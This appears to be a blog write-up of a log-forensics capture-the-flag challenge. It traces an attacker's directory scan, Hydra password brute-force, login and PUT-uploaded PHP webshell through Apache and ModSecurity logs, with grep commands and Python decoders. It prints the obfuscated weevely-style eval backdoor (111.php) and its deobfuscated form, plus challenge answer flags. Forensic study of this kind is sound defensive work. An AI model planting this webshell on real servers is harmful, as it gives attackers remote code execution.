T3 Ironman Triathlon Traceback (铁人三项溯源)

Link to the original blog post

1. What internal IP address did the attacker use when attacking the server?

Look at the directory listing

ls -al

Look at the first 10 lines

head -n 10 access_log-20230426

Look at the first 100 lines

head -n 100 access_log-20230426
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_scriptlibrary HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_scripts HTTP/1.1" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_source HTTP/1.1" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_src HTTP/1.1" 404 202 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_stats HTTP/1.1" 404 204 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_styles HTTP/1.1" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_swf HTTP/1.1" 404 202 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_temp HTTP/1.1" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_tempalbums HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
flag:192.168.12.140

2. How many directory-scan requests did the attacker make in total?

Counting these one by one is obviously impractical. Instead, grep the matching lines and count them with wc. For the match we use the User-Agent: as seen above, the many 404 responses all carry the User-Agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)", so we match on that string:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

cat access_log-20230426 | grep "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" | wc -l
┌──(root㉿kali)-[~/SY_project/T3/t3]
└─# cat access_log-20230426 | grep "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" | wc -l
55510
-c # count bytes (--bytes or --chars): print only the byte count
-l # count lines (--lines): print only the line count
-m # count characters; this flag cannot be combined with -c
-w # count words (--words): print only the word count; a word is a string delimited by blanks, tabs or newlines
-L # print the length of the longest line
--help    # show help
--version # show version information

"|" pipe operator
Separates two commands:
the output of the command on the left of "|" becomes the input of the command on the right.
Put simply, it passes data along.
flag:55510

3. How many password brute-force attempts did the attacker make?

Look at the first 100 lines

head -n 100 access_log-20230426  # nothing noteworthy here

Grep for ://

http://192.168.12.154/index.php?c=access&a=login

Grep for c=access&a=login

cat access_log-20230426 | grep "c=access&a=login" | wc -l

└─# cat access_log-20230426 | grep "c=access&a=login" | wc -l
4116

The brute-force attempts are POST requests

cat access_log-20230426 | grep "POST /index.php?c=access&a=login" | wc -l

└─# cat access_log-20230426 | grep "index.php?c=access&a=login" | wc -l
2053

Don't count the lines just yet; dump the matches first and look for what differs.

cat access_log-20230426 | grep "index.php?c=access&a=login"

192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:29 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:22:34 +0800] "POST /index.php?c=access&a=login HTTP/1.1" 302 - "http://192.168.12.154/index.php?c=access&a=login" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:22:34 +0800] "GET /index.php?c=access&a=index HTTP/1.1" 200 126659 "http://192.168.12.154/index.php?c=access&a=login" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:30:19 +0800] "GET /index.php?c=access&a=login HTTP/1.1" 200 5187 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"

So the brute-force requests all carry the User-Agent Mozilla/5.0 (Hydra)

cat access_log-20230426 | grep "Mozilla/5.0 (Hydra)" | grep "POST /index.php?c=access&a=login"

Now every line has the same format

Count the lines

cat access_log-20230426 | grep "Mozilla/5.0 (Hydra)" | grep "POST /index.php?c=access&a=login" | wc -l

└─# cat access_log-20230426 | grep "Mozilla/5.0 (Hydra)" | grep "POST /index.php?c=access&a=login" | wc -l
2051
flag:2051

4. What username and password did the attacker log in with? Format: username, password

Grep it

cat access_log-20230426 | grep "c=access&a=login"


192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:29 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:22:34 +0800] "POST /index.php?c=access&a=login HTTP/1.1" 302 - "http://192.168.12.154/index.php?c=access&a=login" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:22:34 +0800] "GET /index.php?c=access&a=index HTTP/1.1" 200 126659 "http://192.168.12.154/index.php?c=access&a=login" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:30:19 +0800] "GET /index.php?c=access&a=login HTTP/1.1" 200 5187 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"

This line is odd

192.168.12.140 - - [04/Dec/2019:16:22:34 +0800] "POST /index.php?c=access&a=login HTTP/1.1" 302 - "http://192.168.12.154/index.php?c=access&a=login" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

Search modsec_audit.log-20230426 for the timestamp 2019:16:22:34

--2d6bdf4c-A--
[04/Dec/2019:16:22:34 +0800] XedsymRc9uMOIVLA@x7DOwAAAAk 192.168.12.140 60944 192.168.12.154 80
--2d6bdf4c-B--
POST /index.php?c=access&a=login HTTP/1.1
Host: 192.168.12.154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.12.154/index.php?c=access&a=login
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Cookie: PHPSESSID=pc798vav3vi10j246lu3m8osr1
Connection: close
Upgrade-Insecure-Requests: 1

--2d6bdf4c-C--
login%5Busername%5D=admin&login%5Bpassword%5D=p455w0rd&configOptionSelect=Default
--2d6bdf4c-F--
flag:admin/p455w0rd

5. What email address did the attacker add?

Grep it

cat access_log-20230426 | grep "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
Nothing useful in the output

Try grepping .com instead

cat access_log-20230426 | grep ".com"
# far too noisy

Let's try a regex

This regex works:
\.(com)+

cat access_log-20230426 | grep -E "\.(com)+"
What this regex matches:
\.(com)+ is a regular expression that matches strings containing one or more "com" suffixes. Its parts mean the following:

\. matches a literal dot ("."). The backslash escape is needed because an unescaped dot matches any character; escaped, it matches an actual dot.
(com)+ matches one or more consecutive "com" strings, i.e. "com", "comcom", "comcomcom" and so on.
So the regex matches strings such as "example.com", "www.example.com", "foo.bar.com" and "example.com.com".
┌──(root㉿kali)-[~/SY_project/T3/t3]
└─# cat access_log-20230426 | grep -E "\.(com)+" 
192.168.12.140 - - [04/Dec/2019:16:23:22 +0800] "GET /index.php?&ajax=true&c=contact&a=check_existing_email&email=admin%40zz.com&id_contact=&contact_type=og_1575447785_947935 HTTP/1.1" 200 212 "http://192.168.12.154/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:29:26 +0800] "GET /upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a HTTP/1.1" 200 772 "http://www.google.com/url?sa=1&source=web&ct=7&url=http%3A//192.168.12.154/upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a&rct=j&q=&ei=ZWNob&usg=yg0MT&sig2=YwMik7" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es-es) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3"
192.168.12.140 - - [04/Dec/2019:16:29:46 +0800] "GET /upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a HTTP/1.1" 200 772 "http://www.google.com/url?sa=1&source=web&ct=7&url=http%3A//192.168.12.154/upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a&rct=j&q=&ei=ZWNob&usg=yg1Mj&sig2=Q2Myk7" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13"
@ -> %40 (URL encoding)
flag:admin@zz.com
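The three grep | wc counts above (questions 2, 3 and 5) can be done in one pass with a real log parser that also URL-decodes the query string instead of eyeballing %40. This is an added example, not part of the original writeup; the sample lines are a constructed excerpt copied from the log output shown above, so the counts it returns are for that excerpt, not for the full file.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: client, ident, user, [time], "request", status, size, "referer", "agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

# Constructed excerpt: a few lines copied from the log output shown above, not the whole file.
SAMPLE_LOG = """\
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_scripts HTTP/1.1" 404 206 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:01:31 +0800] "GET /_temp HTTP/1.1" 404 203 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.168.12.140 - - [04/Dec/2019:16:21:28 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:21:29 +0800] "POST /index.php?c=access&a=login HTTP/1.0" 200 5328 "-" "Mozilla/5.0 (Hydra)"
192.168.12.140 - - [04/Dec/2019:16:22:34 +0800] "POST /index.php?c=access&a=login HTTP/1.1" 302 - "http://192.168.12.154/index.php?c=access&a=login" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:23:22 +0800] "GET /index.php?&ajax=true&c=contact&a=check_existing_email&email=admin%40zz.com&id_contact=&contact_type=og_1575447785_947935 HTTP/1.1" 200 212 "http://192.168.12.154/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
"""


def parse_log(text):
    """Yield one dict per well-formed line; lines that do not fit the format are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def count_dir_scan(entries, agent):
    """Q2: scanner requests, counted by the scanner's User-Agent as the writeup does."""
    return sum(1 for e in entries if e["agent"] == agent)


def count_bruteforce(entries, path, agent="Mozilla/5.0 (Hydra)"):
    """Q3: POSTs to the login action from the brute-force tool; the real browser login is excluded."""
    return sum(1 for e in entries
               if e["method"] == "POST" and e["path"].startswith(path) and e["agent"] == agent)


def find_query_params(entries, param):
    """Q5: URL-decode every query string and collect the values of one parameter (%40 -> @)."""
    found = []
    for e in entries:
        found.extend(parse_qs(urlsplit(e["path"]).query).get(param, []))
    return found


if __name__ == "__main__":
    entries = list(parse_log(SAMPLE_LOG))
    print(count_dir_scan(entries, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"))  # 2
    print(count_bruteforce(entries, "/index.php?c=access&a=login"))  # 2
    print(find_query_params(entries, "email"))  # ['admin@zz.com']
```

Run it against the full access_log-20230426 by passing the file contents to parse_log; on the complete file the first two counts should reproduce the 55510 and 2051 obtained with grep above.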

6. What is the absolute path of the first webshell the attacker uploaded? (This webshell was never used.)

Grep it

cat access_log-20230426 | grep "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
See what the attacker did
192.168.12.140 - - [04/Dec/2019:16:28:56 +0800] "GET /icons/back.gif HTTP/1.1" 200 216 "http://192.168.12.154/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:28:59 +0800] "GET /upload/055/ HTTP/1.1" 200 897 "http://192.168.12.154/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:29:00 +0800] "GET /upload/055/741/ HTTP/1.1" 200 909 "http://192.168.12.154/upload/055/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:29:01 +0800] "GET /upload/055/741/33e/ HTTP/1.1" 200 952 "http://192.168.12.154/upload/055/741/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:29:01 +0800] "GET /icons/unknown.gif HTTP/1.1" 200 245 "http://192.168.12.154/upload/055/741/33e/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:29:04 +0800] "GET /upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a HTTP/1.1" 200 772 "http://192.168.12.154/upload/055/741/33e/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:30:56 +0800] "GET /upload/ HTTP/1.1" 200 882 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:30:56 +0800] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://192.168.12.154/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:30:56 +0800] "GET /icons/back.gif HTTP/1.1" 200 216 "http://192.168.12.154/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:30:56 +0800] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://192.168.12.154/upload/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
192.168.12.140 - - [04/Dec/2019:16:31:28 +0800] "GET /111.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
This request for the uploaded file is odd
192.168.12.140 - - [04/Dec/2019:16:29:04 +0800] "GET /upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a HTTP/1.1" 200 772 "http://192.168.12.154/upload/055/741/33e/" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

Grep for the other related entries

upload/055
cat access_log-20230426 | grep "upload/055"

Check the detailed log (modsec_audit.log-20230426)

In modsec_audit.log-20230426, upload/055 matches only 31 entries

In modsec_audit.log-20230426, POST /upload/055 matches only 2 entries

POST /upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a HTTP/1.1
Accept-Encoding: identity
Content-Length: 83
Host: 192.168.12.154
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Opera/9.25 (Windows NT 5.1; U; zh-cn)
Path: /upload/055/741/33e/896eee6d3709e7ff535b01986e7de1a
flag:/var/www/html//upload/055/741/33e/

7. How was the webshell uploaded, and what is its password? Uppercase letters, separated by a space.

Grep for .php

cat access_log-20230426 | grep -E "\.(php)+"
192.168.12.140 - - [04/Dec/2019:16:22:38 +0800] "POST /index.php?c=gui&a=save_state HTTP/1.1" 200 16 "http://192.168.12.154/index.php?c=access&a=index" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"

192.168.12.140 - - [04/Dec/2019:16:35:49 +0800] "POST /111.php HTTP/1.1" 200 52 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20061215 Red Hat/1.5.0.9-0.1.el4 Firefox/1.5.0.9"
# two files show up: index.php and 111.php

index.php is not suspicious, so look more closely at 111.php

cat access_log-20230426 | grep -E "111\.(php)+"
192.168.12.140 - - [04/Dec/2019:16:31:16 +0800] "PUT /111.php HTTP/1.1" 201 180 "-" "curl/7.63.0"
# so it was uploaded with a PUT request

Analyze the password

111.php

<?php
$b='="oO!tvN!y5TkuOg1fjf!";func!t!ion x($t,$k!){$c=str!len($k!);$l=s!tr';
$u=str_replace('kA','','crkAeatkAekA_fkAkAunkAction');
$F=';$j++,$i++!)!!{$o.=$t{$i}^$k{$!j};!}}!return !$o;}if (@pr!eg!!_';
$n='r=@b!ase65_en!code(!@x(@gzc!ompres!s($o),$k!));pri!nt!("$p$k!h$r$kf");}';
$S='match("/$kh(.+)$!!kf/",@file!_get_!cont!ents!("php://in!put"),$!';
$s='m)=!=2) {@ob_star!t()!;@e!val!(@gz!uncompress(@x(@ba!se64!_deco!d';
$e='e($m![2!]),$k)));!$o=@ob_get!_co!ntents(!);@ob_end!_clean!();$!';
$I='!!$k="bd377!f!17";!$kh="9d4!cd50b4843";$kf="5b!d9ce82!0!932";$p';
$H='!len($t);$o=!"";f!o!r($i=1;!$!i<$l;){for($j=0;(!$j<$c!!&&$i<$!l)';
$J=str_replace('!','',$I.$b.$H.$F.$S.$s.$e.$n);
$V=$u('',$J);$V();
echo $J;
?>
# run it

$k="bd377f17";$kh="9d4cd50b4843";$kf="5bd9ce820932";$p="oOtvNy5TkuOg1fjf";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=1;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==2) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[2]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base65_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}
-----------
<?php
$k  = "bd377f17";
$kh = "9d4cd50b4843";
$kf = "5bd9ce820932";
$p = "oOtvNy5TkuOg1fjf";
function x($t, $k)
{
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 1; $i < $l;) {
        for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
            $o .= $t{$i} ^ $k{$j};
        }
    }
    return $o;
}
if (@preg_match("/$kh(.+)$kf/", @file_get_contents("php://input"), $m) == 2) {
    @ob_start();
    @eval(@gzuncompress(@x(@base64_decode($m[2]), $k)));
    $o = @ob_get_contents();
    @ob_end_clean();
    $r = @base65_encode(@x(@gzcompress($o), $k));
    print("$p$kh$r$kf");
}
# For the detailed decryption see https://xz.aliyun.com/t/11246#reply-18400
# and also https://artikrh.sh/posts/weevely-backdoor-analysis.html

Look at the actual request in the audit log

--4b398f30-B--
POST /111.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 83
Host: 192.168.12.154
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.9) Gecko/20061215 Red Hat/1.5.0.9-0.1.el4 Firefox/1.5.0.9

--4b398f30-C--
zYgIi?{4d\>;=h'=a0b923820dccG6goLPr65AhWAlXS5IY1OHTFYFQ509a6f75849b2}Zb&G6y+(+]3VCr
--4b398f30-F--
HTTP/1.1 200 OK
X-Powered-By: PHP/5.4.16
Content-Length: 60
Connection: close
Content-Type: text/html; charset=UTF-8

--4b398f30-E--
kbPze6iWSynLVEi5a0b923820dccG6hQVAIEgDhjN3RgPg==509a6f75849b
--4b398f30-H--
Apache-Handler: application/x-httpd-php
Stopwatch: 1575448316609856 1233 (- - -)
Stopwatch2: 1575448316609856 1233; combined=36, p1=12, p2=20, p3=1, p4=0, p5=2, sr=0, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.2 (http://www.modsecurity.org/).
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Engine-Mode: "DETECTION_ONLY"

--4b398f30-Z--

bohemian says:

$kh = a0b923820dcc
$kf = 509a6f75849b
$p  = kbPze6iWSynLVEi5
$k  = 
look it up on cmd5

Lookup result:
md5(1,32) = c4ca4238a0b923820dcc509a6f75849b
md5(1,16) = a0b923820dcc509a
flag:PUT 1
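To confirm the password and recover what the attacker actually ran through 111.php, the captured request body (section C) and response body (section E) from the audit log above can be decoded offline. This is an added example, not from the writeup or the linked articles; it assumes the standard weevely agent layout (k = md5[0:8], kh = md5[8:20], kf = md5[20:32], and x() XORing from index 0, which differs from the index-1 transcription shown above but is the only reading that yields a valid zlib header on the captured bytes), and the candidate password list is constructed.

```python
import base64
import hashlib
import re
import zlib

# Bodies captured in the modsec audit log above: request section C and response section E.
REQUEST_BODY = r"zYgIi?{4d\>;=h'=a0b923820dccG6goLPr65AhWAlXS5IY1OHTFYFQ509a6f75849b2}Zb&G6y+(+]3VCr"
RESPONSE_BODY = "kbPze6iWSynLVEi5a0b923820dccG6hQVAIEgDhjN3RgPg==509a6f75849b"

# Constructed candidate list standing in for the cmd5 lookup; the challenge answer "1" is in it.
CANDIDATES = ["admin", "p455w0rd", "123456", "1"]


def derive_keys(password):
    """Split md5(password) into k (8 hex), kh (12 hex) and kf (12 hex), the agent's layout."""
    h = hashlib.md5(password.encode()).hexdigest()
    return h[:8], h[8:20], h[20:32]


def find_password(kh, kf, candidates):
    """Return the candidate whose kh/kf match the markers seen in the traffic, else None."""
    for cand in candidates:
        _, ch, cf = derive_keys(cand)
        if ch == kh and cf == kf:
            return cand
    return None


def xor_cycle(data, key):
    # Assumed standard x(): byte i is XORed with key[i % len(key)], starting at index 0.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_body(body, password):
    """Strip the kh ... kf framing, base64-decode, XOR with k and zlib-inflate the payload."""
    k, kh, kf = derive_keys(password)
    m = re.search(re.escape(kh) + r"(.+?)" + re.escape(kf), body)
    if not m:
        raise ValueError("kh/kf markers not found in body")
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # the captured request payload has no base64 padding
    raw = xor_cycle(base64.b64decode(b64), k.encode())
    return zlib.decompress(raw).decode()


if __name__ == "__main__":
    pw = find_password("a0b923820dcc", "509a6f75849b", CANDIDATES)
    print("password:", pw)                              # 1
    print("request :", decode_body(REQUEST_BODY, pw))   # PHP the attacker sent
    print("response:", decode_body(RESPONSE_BODY, pw))  # what the shell returned
```

The decoded request is a single echo of a number and the response is that number, i.e. the connectivity check weevely performs after connecting, which is consistent with the log showing only one POST to 111.php.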

8-10

Not reproduced by the original author


Author: hengxinyan
Copyright notice: Unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit hengxinyan when reposting!